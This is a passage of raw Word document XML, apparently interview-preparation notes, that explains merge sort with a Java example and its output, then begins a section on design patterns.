        <w:t>Recursively sorts</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each half,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E9A8D" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1827"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>merges</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the two sorted halves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FBD709" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00000000" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="58939B9A">
          <v:rect id="_x0000_i1997" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D753681" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B8E295" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1828"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Divide</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the array until each sub-array contains only one element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D94161" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1828"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Merge</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the sub-arrays in a sorted manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ADD226" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00000000" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="31C53DFC">
          <v:rect id="_x0000_i1998" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6763C036" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Time and Space Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1D199" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1829"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Time Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(n log n) in all cases (best, average, worst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462CFB2" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1829"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Space Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(n) – due to temporary arrays used during merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6B5E7" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00000000" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="76E7BA9E">
          <v:rect id="_x0000_i1999" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D61BE" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDB958F"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public class MergeSort {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F055920"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public static void mergeSort(int[] arr, int left, int right) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B391A15"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if (left &lt; right) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA8255"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int mid = (left + right) / 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10569D2C" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D84D7D"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mergeSort(arr, left, mid);        // Sort left half</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3621B091"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mergeSort(arr, mid + 1, right);   // Sort right half</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F83B1" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EBEF0C"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merge(arr, left, mid, right);     // Merge both halves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413E7FB8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B67FF3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15575968" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530DB33C"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private static void merge(int[] arr, int left, int mid, int right) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1F770"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int n1 = mid - left + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E5A15"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int n2 = right - mid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF29BAA" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424A9FE6"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int[] L = new int[n1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E51DE9"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int[] R = new int[n2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B947F0" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A09A94A"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for (int i = 0; i &lt; n1; i++) L[i] = arr[left + i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB05353"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for (int j = 0; j &lt; n2; j++) R[j] = arr[mid + 1 + j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A797005" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCB33A0"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int i = 0, j = 0, k = left;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118869BA" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394CCDED"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while (i &lt; n1 &amp;&amp; j &lt; n2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5284D044"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arr[k++] = (L[i] &lt;= R[j]) ? L[i++] : R[j++];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36B25E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6965AF0A" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF90C3D"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while (i &lt; n1) arr[k++] = L[i++];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795778CB"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while (j &lt; n2) arr[k++] = R[j++];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1EEAC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDF7C1" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49467497"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF397A7"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int[] arr = {38, 27, 43, 3, 9, 82, 10};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DB07E"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mergeSort(arr, 0, arr.length - 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7238AEE8"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System.out.println(Arrays.toString(arr));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039AF205"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A43677B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5C655" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00000000" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="32EF49F1">
          <v:rect id="_x0000_i2000" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F66CE4" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC41A4"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3, 9, 10, 27, 38, 43, 82]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582F101C" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Merge Sort is stable and preferred for sorting linked lists or large datasets where consistent performance matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21938140" w14:textId="3098B93F" w:rsidR="008F201A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D86B7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915B39F">
          <v:rect id="_x0000_i2001" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="008F201A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A1F56" w14:textId="08EEFE04" w:rsidR="00516033" w:rsidRPr="00CE4B95" w:rsidRDefault="00516033" w:rsidP="00516033">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="414" w:name="_Toc196307894"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Design Patterns</w:t>
      </w:r>
      <w:bookmarkEnd w:id="414"/>
    </w:p>
    <w:p w14:paraId="0CD65147" w14:textId="77777777" w:rsidR="00D55EBE" w:rsidRPr="00CE4B95" w:rsidRDefault="00D55EBE" w:rsidP="00D55EBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA60662" w14:textId="62B87857" w:rsidR="000D56E3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C6064A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="415" w:name="_Toc196307895"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Design pattern? Explain all design pattern?</w:t>
      </w:r>
      <w:r w:rsidR="00081EA0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="415"/>
    </w:p>
    <w:p w14:paraId="7F63EF9C" w14:textId="72678071" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8" w:rsidP="00FE4147">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>proven, reusable solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a common problem in software design. It represents best practices used by experienced developers to solve recurring design issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC3406" w14:textId="77777777" w:rsidR="00147AB8"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123D971">
          <v:rect id="_x0000_i2002" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94A9DC" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Types of Design Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11455B67"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Design patterns are broadly categorized into </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 main types</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
